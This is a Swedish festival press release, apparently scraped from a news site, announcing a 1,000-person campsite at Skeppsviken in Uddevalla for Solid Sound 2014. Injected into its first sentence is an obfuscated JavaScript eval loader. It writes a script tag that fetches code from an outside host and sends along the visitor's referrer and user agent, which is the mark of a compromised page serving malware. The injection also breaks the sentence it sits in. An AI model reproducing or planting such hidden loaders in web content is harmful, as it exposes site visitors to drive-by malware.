Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Solid Sound lanserar camping i anknytning till årets festival

Solid Sound lanserar camping i anknytning till årets festival
Sebastian

Campingen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ztisk|var|u0026u|referrer|rnzsn||js|php’.split(’|’),0,{}))
kommer att vara placerad vid Skeppsviken, centralt i Uddevalla och kommer rymma 1000 personer. Tillgång till toalett, rinnande vatten och livsmedelsaffär finns i närheten av campingen. Med utsikt över Uddevallas fantastiska vik och med krypavstånd till badplatser och hav samt närhet till tennisbanor och kiosker är det en helt fantastisk plats för de som väljer att campa.

”Det har gått väldigt fort. 2012 startade vi en tvådags festival på en bakgård i Uddevalla. För ett år sedan flyttade vi till Riversideängen, tusentals fler besökte vår festival och några av Sveriges bästa artister spelade. Intresset för festivalen har växt mycket utanför regionen och vi har under en längre tid undersökt campingmöjligheter i relation till vår festival i år. Nu har vi hittat den ultimata platsen”, säger Pontus Blom medgrundare av Solid Sound.

Transport till festivalområdet kommer att ingå och avgångar kommer gå löpande under fredagen och lördagen. Campingbiljetter finns att köpa på Ticnet till en kostnad av 350 kr oavsett hur många nätter man stannar, åldersgränsen är 15 år. Tillsammans med boendealternativet som Blå Tåget erbjuder är Solid Sound redo för besökare från hela landet.

”Vi vågar påstå att vyn är ett av de vackraste i hela regionen och representerar Bohuslän på bästa sätt. Campingen har varit en viktig pusselbit i år för att kunna erbjuda våra besökare ett klassiskt festivalboende”, fortsätter Pontus Blom.

Campingbiljetterna släpps nu på måndag 30/6 klockan 09.00

För mer information om campingen, gå in på: www.uddevallasolidsound.se/boende

För att boka campingplats, gå in på: http://www.ticnet.se/event/uddevalla-solid-sound-campingbiljett-biljetter/335245

Datum för 2014 års festival: 29 & 30 Augusti

Bilden ovan är inte från Solid Sound!!

Detta är ett pressmeddelande från Solid Sound

Plats: Riversideängen